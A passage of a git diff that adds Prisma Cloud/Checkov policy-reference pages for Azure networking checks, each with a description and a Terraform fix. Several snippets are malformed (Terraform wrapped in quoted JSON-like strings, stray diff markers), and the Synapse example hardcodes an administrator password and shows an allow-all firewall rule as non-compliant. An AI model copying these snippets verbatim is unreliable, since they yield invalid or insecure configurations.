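+The fix below sets only the relevant argument; as a fuller, self-contained sketch (the resource names, subnet wiring, and container image are illustrative assumptions, not part of the policy), a container group deployed into a virtual network through a network profile might look like: + +[source,go] +---- +resource "azurerm_network_profile" "example" { + name = "example-profile" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + + container_network_interface { + name = "example-nic" + + ip_configuration { + name = "example-ipconfig" + subnet_id = azurerm_subnet.example.id + } + } +} + +resource "azurerm_container_group" "example_private" { + name = "example-group" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + os_type = "Linux" + ip_address_type = "Private" + network_profile_id = azurerm_network_profile.example.id + + container { + name = "example-app" + image = "mcr.microsoft.com/azuredocs/aci-helloworld:latest" + cpu = "0.5" + memory = "1.5" + } +} +----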
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_container_group +* *Arguments:* network_profile_id + + +[source,go] +---- +resource "azurerm_container_group" "example" { + ... + + network_profile_id = azurerm_network_profile.example.id +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cosmos-db-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cosmos-db-disables-public-network-access.adoc new file mode 100644 index 000000000..1b766b69b --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cosmos-db-disables-public-network-access.adoc @@ -0,0 +1,52 @@ +== Azure Cosmos DB enables public network access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 24bcd432-30aa-4ec4-b379-c3d5a69cbd54 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py[CKV_AZURE_101] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your Azure Cosmos DB is not public, you can help protect your data from unauthorized access or tampering. +Public Azure Cosmos DBs are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_cosmosdb_account +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +resource "azurerm_cosmosdb_account" "db" { + ...
+ + public_network_access_enabled = false + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-data-factory-public-network-access-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-data-factory-public-network-access-is-disabled.adoc new file mode 100644 index 000000000..729524439 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-data-factory-public-network-access-is-disabled.adoc @@ -0,0 +1,57 @@ +== Azure Data Factory (V2) configured with overly permissive network access +// Azure Data Factory (V2) configured with excessively permissive network access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d96a6d5b-0399-45dc-8fac-db55d711710b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py[CKV_AZURE_104] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your Azure Data Factory is not public, you can help protect your data from unauthorized access or tampering. +Public Azure Data Factory instances are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_data_factory +* *Arguments:* public_network_enabled + + +[source,go] +---- +resource "azurerm_data_factory" "example" { + ...
++ public_network_enabled = false +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-event-grid-domain-public-network-access-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-event-grid-domain-public-network-access-is-disabled.adoc new file mode 100644 index 000000000..3f013e4f3 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-event-grid-domain-public-network-access-is-disabled.adoc @@ -0,0 +1,56 @@ +== Azure Event Grid domain public network access is enabled +// Azure Event Grid domain public network access enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 58c7b0ec-3c69-4879-bdab-35dd49536d7b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py[CKV_AZURE_106] + +|Severity +|MEDIUM + +|Subtype
+|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your Azure Event Grid domain is not public, you can help protect your data from unauthorized access or tampering. +Public Azure Event Grid domains are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_eventgrid_domain +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +resource "azurerm_eventgrid_domain" "example" { + ...
++ public_network_access_enabled = false +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-file-sync-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-file-sync-disables-public-network-access.adoc new file mode 100644 index 000000000..179491ed3 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-file-sync-disables-public-network-access.adoc @@ -0,0 +1,53 @@ +== Azure file sync enables public network access +// Azure File Sync enables public network access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7a1f479f-5ccf-4505-a2c2-ff8c2b65d6c0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py[CKV_AZURE_64] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your Azure file sync is not public, you can help protect your data from unauthorized access or tampering. +Public Azure File Sync services are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_sync +* *Arguments:* incoming_traffic_policy + + +[source,go] +---- +resource "azurerm_storage_sync" "example" { + ...
++ incoming_traffic_policy = "AllowVirtualNetworksOnly" +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-enables-waf.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-enables-waf.adoc new file mode 100644 index 000000000..c3399a72d --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-enables-waf.adoc @@ -0,0 +1,58 @@ +== Azure Front Door does not have the Azure Web Application Firewall (WAF) enabled +// Azure Web Application Firewall (WAF) disabled for Azure Front Door + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5ef0bea5-11c9-497d-9637-4a430368c754 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py[CKV_AZURE_121] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks
+|Terraform, TerraformPlan + +|=== + + + +=== Description + + +WAF is a security feature that provides protection for web applications by inspecting incoming traffic and blocking malicious requests before they reach the application. +When WAF is enabled on an Azure Front Door, it analyzes incoming traffic to the front door and blocks requests that are determined to be malicious based on a set of rules. +This can help to protect your application from a variety of threats, such as SQL injection attacks, cross-site scripting (XSS) attacks, and other types of attacks. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_frontdoor +* *Arguments:* web_application_firewall_policy_link_id + + +[source,go] +---- +resource "azurerm_frontdoor" "example" { + ... ++ web_application_firewall_policy_link_id = azurerm_frontdoor_firewall_policy.example.id + ...
+} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-uses-waf-in-detection-or-prevention-modes.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-uses-waf-in-detection-or-prevention-modes.adoc new file mode 100644 index 000000000..197b757f2 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-uses-waf-in-detection-or-prevention-modes.adoc @@ -0,0 +1,63 @@ +== Azure Front Door does not use WAF in Detection or Prevention modes +// Azure Front Door does not use Web Application Firewall (WAF) in Detection or Prevention mode + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 53b040ee-039c-49f2-82dd-d4187eacf5fd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py[CKV_AZURE_123] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +WAF has two modes: Detection and Prevention. +In Detection mode, WAF analyzes incoming traffic to the Azure Front Door and logs any requests that are determined to be malicious based on a set of rules. +This can help you to identify potential security threats and take appropriate action to protect your application. +In Prevention mode, WAF analyzes incoming traffic to the Azure Front Door and blocks any requests that are determined to be malicious based on a set of rules. +This can help to prevent malicious requests from reaching your application and potentially causing damage. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_frontdoor_firewall_policy +* *Arguments:* policy_settings.enabled + policy_settings.mode + + +[source,go] +---- +resource "azurerm_frontdoor_firewall_policy" "example" { + + ...
+ policy_settings { + + enabled = true + + mode = "Prevention" + request_body_check = true + file_upload_limit_in_mb = 100 + max_request_body_size_in_kb = 128 + } + ... + } +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-iot-hub-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-iot-hub-disables-public-network-access.adoc new file mode 100644 index 000000000..c135262fd --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-iot-hub-disables-public-network-access.adoc @@ -0,0 +1,60 @@ +== Azure IoT Hub enables public network access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 53001655-cd04-47e1-93cc-406be8836f38 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py[CKV_AZURE_108] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your IoT Hub is not public, you can help protect your data from unauthorized access or tampering. +Public IoT Hubs are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_iothub +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +resource "azurerm_iothub" "example" { + ... ++ public_network_access_enabled = false + route { + name = "export" + source = "DeviceMessages" + condition = "true" + endpoint_names = ["export"] + enabled = true + } + ... 
+ } +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-enables-managed-virtual-networks.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-enables-managed-virtual-networks.adoc new file mode 100644 index 000000000..a959a72ee --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-enables-managed-virtual-networks.adoc @@ -0,0 +1,53 @@ +== Azure Synapse Workspaces do not enable managed virtual networks +// Managed virtual networks in Azure Synapse Workspaces disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 83494f5a-bfc0-418d-8b68-3bb20e5e4505 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py[CKV_AZURE_58] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +Enabling managed virtual networks in Azure Synapse Workspaces can help to improve security and isolation for your data and workloads. +By using a managed virtual network, you can control access to your data and resources by defining network security rules and configuring network routing. +Managed virtual networks can also help to improve the performance of your data and analytics workloads by reducing network latency and optimizing network traffic. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_synapse_workspace +* *Arguments:* managed_virtual_network_enabled + + +[source,go] +---- +resource "azurerm_synapse_workspace" "example" { + ... 
++ managed_virtual_network_enabled = true + } +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-have-no-ip-firewall-rules-attached.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-have-no-ip-firewall-rules-attached.adoc new file mode 100644 index 000000000..3726f4f6c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-have-no-ip-firewall-rules-attached.adoc @@ -0,0 +1,77 @@ +== Azure Synapse workspaces have IP firewall rules attached +// Azure Synapse Workspaces have IP firewall rules attached + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 505eef98-6fa3-4982-908a-991d8870e54a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml[CKV2_AZURE_19] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +IP firewall rules in Azure Synapse are used to control inbound and outbound network traffic to and from your workspace. +By attaching IP firewall rules to your workspace, you can control which IP addresses or ranges have access to your workspace and what actions they can perform. +However, attaching IP firewall rules to your workspace can also introduce potential security risks because it allows you to specify specific IP addresses or ranges that have access to your workspace. +If an attacker is able to determine the IP address of your workspace, they could potentially gain access to it if the IP address is included in the firewall rules. 
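The intent of this graph check can be sketched in a few lines of Python over a simplified, parsed view of the configuration. This is an illustrative approximation only, not Checkov's actual implementation; the tuple shape and resource names below are assumptions made for the example.

```python
# Illustrative sketch: flag Synapse workspaces that have an IP firewall rule
# attached. The (type, name, attributes) tuple shape is an assumption, not
# Checkov's real internal representation.
def workspaces_with_firewall_rules(resources):
    workspaces = {
        name for rtype, name, _ in resources
        if rtype == "azurerm_synapse_workspace"
    }
    flagged = set()
    for rtype, _, attrs in resources:
        if rtype == "azurerm_synapse_firewall_rule":
            # synapse_workspace_id points at the workspace the rule is attached to
            target = attrs.get("synapse_workspace_id", "")
            for ws in workspaces:
                if ws in target:
                    flagged.add(ws)
    return flagged

resources = [
    ("azurerm_synapse_workspace", "workspace_good", {}),
    ("azurerm_synapse_firewall_rule", "firewall_rule",
     {"synapse_workspace_id": "azurerm_synapse_workspace.workspace_good.id"}),
]
print(workspaces_with_firewall_rules(resources))  # {'workspace_good'}
```

A workspace is flagged as soon as any `azurerm_synapse_firewall_rule` references it, which mirrors the pass/fail condition described above.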
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_synapse_firewall_rule, azurerm_resource_group, azurerm_synapse_workspace
+* *Arguments:* synapse_workspace_id (of _azurerm_synapse_firewall_rule_)
+
+
+[source,go]
+----
+resource "azurerm_resource_group" "example" {
+  name     = "example-resources"
+  location = "West Europe"
+}
+
+
+# workspace_good passes the check: no firewall rule references it
+resource "azurerm_synapse_workspace" "workspace_good" {
+  name                             = "example"
+  sql_administrator_login          = "sqladminuser"
+  sql_administrator_login_password = "H@Sh1CoR3!"
+  managed_virtual_network_enabled  = true
+  tags = {
+    Env = "production"
+  }
+
+}
+
+
+# This rule is attached to a separate, non-compliant workspace (workspace_bad, not shown)
+resource "azurerm_synapse_firewall_rule" "firewall_rule" {
+  name                 = "AllowAll"
+  synapse_workspace_id = azurerm_synapse_workspace.workspace_bad.id
+  start_ip_address     = "0.0.0.0"
+  end_ip_address       = "255.255.255.255"
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-function-apps-is-only-accessible-over-https.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-function-apps-is-only-accessible-over-https.adoc
new file mode 100644
index 000000000..9181ff957
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-function-apps-is-only-accessible-over-https.adoc
@@ -0,0 +1,53 @@
+== Azure Function App doesn't redirect HTTP to HTTPS
+// Azure Function App does not redirect HTTP traffic to HTTPS
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 46d8388d-72e4-413c-9a44-3670df42cfea
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py[CKV_AZURE_70]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+By ensuring that function apps are only accessible over HTTPS, you can help to protect the data transmitted to and from
your app from being accessed or modified by unauthorized parties. +This can help to improve the security of your app and protect it from potential threats such as man-in-the-middle attacks or data breaches. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* https_only + + +[source,go] +---- +resource "azurerm_app_service" "example" { + ... + + https_only = true + } +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-key-vault-allows-firewall-rules-settings.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-key-vault-allows-firewall-rules-settings.adoc new file mode 100644 index 000000000..b5aa47363 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-key-vault-allows-firewall-rules-settings.adoc @@ -0,0 +1,59 @@ +== Key vault does not allow firewall rules settings +// Azure Key Vault does not allow firewall rules settings + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ba230f7b-fea0-405b-b022-bc0bded68577 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py[CKV_AZURE_109] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Key vault's firewall prevents unauthorized traffic from reaching your key vault and provides an additional layer of protection for your secrets. +Enable the firewall to make sure that only traffic from allowed networks can access your key vault. 
+By setting "bypass" to "AzureServices" and "default_action" to "Deny", only traffic that matches the configured ip_rules and/or virtual_network_subnet_ids is allowed through.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_key_vault
+* *Arguments:* network_acls.default_action
+
+
+[source,go]
+----
+resource "azurerm_key_vault" "example" {
+ ...
+
+ network_acls {
+
+   default_action = "Deny"
+
+   bypass = "AzureServices"
+ }
+
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-disable-ip-forwarding.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-disable-ip-forwarding.adoc
new file mode 100644
index 000000000..b0794b64f
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-disable-ip-forwarding.adoc
@@ -0,0 +1,56 @@
+== Azure Virtual Machine NIC has IP forwarding enabled
+// Azure Virtual Machine NIC IP forwarding enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| e3b0e339-22bd-4b91-9157-e1e7482334f3
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py[CKV_AZURE_118]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+By disabling IP forwarding on the NIC of your Azure virtual machine, you can help to prevent the virtual machine from acting as a router and forwarding traffic to unintended destinations.
+This can help to improve the security of your virtual machine and protect it from potential threats such as man-in-the-middle attacks or data breaches.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_network_interface
+* *Arguments:* enable_ip_forwarding
+
+
+[source,go]
+----
+resource "azurerm_network_interface" "example" {
+ ...
+
+ enable_ip_forwarding = false
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-dont-use-public-ips.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-dont-use-public-ips.adoc
new file mode 100644
index 000000000..aa36be400
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-dont-use-public-ips.adoc
@@ -0,0 +1,71 @@
+== Network interfaces use public IPs
+// Network interfaces use public IP addresses
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| b811692c-9a16-421f-b8f0-847064165f5f
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AZURE_119]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+A public IP address is an IPv4 address that is reachable from the Internet.
+You can use public addresses for communication between your instances and the Internet.
+We recommend you control whether your network interfaces are required to use a public IP address.
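The check's logic can be sketched in plain Python over a simplified view of a NIC's configuration. This is an illustrative approximation only, not Checkov's actual implementation; the dictionary shape is an assumption made for the example.

```python
# Illustrative sketch: flag network interfaces whose ip_configuration blocks
# reference a public IP. The dict shape is an assumption, not Checkov's real
# internal representation.
def nics_using_public_ips(nics):
    flagged = []
    for name, ip_configurations in nics.items():
        # A NIC fails the check if any ip_configuration sets public_ip_address_id
        if any("public_ip_address_id" in cfg for cfg in ip_configurations):
            flagged.append(name)
    return flagged

nics = {
    "private_nic": [{"subnet_id": "subnet-1"}],
    "public_nic": [{"subnet_id": "subnet-2", "public_ip_address_id": "pip-1"}],
}
print(nics_using_public_ips(nics))  # ['public_nic']
```

Passing the check is simply a matter of the attribute being absent, which is why the Terraform fix below omits `public_ip_address_id` entirely.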
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_network_interface
+* *Arguments:* ip_configuration.public_ip_address_id (should not be set)
+
+
+[source,go]
+----
+resource "azurerm_network_interface" "example" {
+  name                = "example-nic"
+  location            = azurerm_resource_group.example.location
+  resource_group_name = azurerm_resource_group.example.name
+
+  ip_configuration {
+    name                          = "internal"
+    subnet_id                     = azurerm_subnet.example.id
+    private_ip_address_allocation = "Dynamic"
+  }
+
+  ip_configuration {
+    name                          = "internal2"
+    subnet_id                     = azurerm_subnet.example2.id
+    private_ip_address_allocation = "Dynamic"
+  }
+
+  enable_ip_forwarding = false
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-only-ssl-are-enabled-for-cache-for-redis.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-only-ssl-are-enabled-for-cache-for-redis.adoc
new file mode 100644
index 000000000..2c292db6e
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-only-ssl-are-enabled-for-cache-for-redis.adoc
@@ -0,0 +1,56 @@
+== Not only SSL is enabled for cache for Redis
+// Not only SSL is enabled for cache for Redis
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| ae1e5122-48d7-47c4-8493-ce3e97a0f488
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py[CKV_AZURE_91]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+SSL helps protect your data from unauthorized access or tampering by encrypting the data as it is transmitted between the Redis instance and the client.
+By enabling SSL, you can help ensure that only authorized users with the correct keys can access and decrypt the data, and that the data is protected while in transit.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_redis_cache
+* *Arguments:* enable_non_ssl_port
+
+
+[source,go]
+----
+resource "azurerm_redis_cache" "example" {
+ ...
+
+ enable_non_ssl_port = false
+ ...
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-postgresql-server-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-postgresql-server-disables-public-network-access.adoc
new file mode 100644
index 000000000..d7bad0d60
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-postgresql-server-disables-public-network-access.adoc
@@ -0,0 +1,55 @@
+== PostgreSQL server does not disable public network access
+// PostgreSQL server public network access enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a07a21c2-bea9-4e5e-8903-aba5c9e6bf02
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py[CKV_AZURE_68]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Disabling the public network access property improves security by ensuring your Azure Database for PostgreSQL single servers can only be accessed from a private endpoint.
+This configuration strictly disables access from any public address space outside of the Azure IP range and denies all logins that match IP or virtual network-based firewall rules.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_postgresql_server
+* *Arguments:* public_network_access_enabled
+
+
+[source,go]
+----
+{
+ "resource "azurerm_postgresql_server" "example" {
+ ...
++ public_network_access_enabled = false
+ ...
+ }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-sql-server-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-sql-server-disables-public-network-access.adoc new file mode 100644 index 000000000..36407e470 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-sql-server-disables-public-network-access.adoc @@ -0,0 +1,55 @@ +== SQL Server is enabled for public network access +// SQL Server public network access enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bfa52af6-2560-48c3-bec8-966da86abb88 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py[CKV_AZURE_113] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your SQL server is not public, you can help protect your data from unauthorized access or tampering. +Public SQL servers are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mssql_server +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +{ + "resource "azurerm_mssql_server" "example" { + ... 
+ + public_network_access_enabled = false + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-storage-account-enables-secure-transfer.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-storage-account-enables-secure-transfer.adoc new file mode 100644 index 000000000..49d599cec --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-storage-account-enables-secure-transfer.adoc @@ -0,0 +1,59 @@ +== Storage Accounts without Secure transfer enabled +// Azure Storage Accounts without Secure transfer enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bc4e467f-10fa-471e-aa9b-28981dc73e93 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountEnablesSecureTransfer.py[CKV_AZURE_60] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +The secure transfer option enhances the security of a storage account by only allowing requests to the storage account by a secure connection. +For example, when calling REST APIs to access storage accounts, the connection must use HTTPS. +Any requests using HTTP will be rejected when 'secure transfer required' is enabled. +When using the Azure files service, connection without encryption will fail, including scenarios using SMB 2.1, SMB 3.0 without encryption, and some flavors of the Linux SMB client. +Because Azure storage doesn't support HTTPS for custom domain names, this option is not applied when using a custom domain name. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_account +* *Arguments:* enable_https_traffic_only + + +[source,go] +---- +{ + " resource "azurerm_storage_account" "example" { + ... 
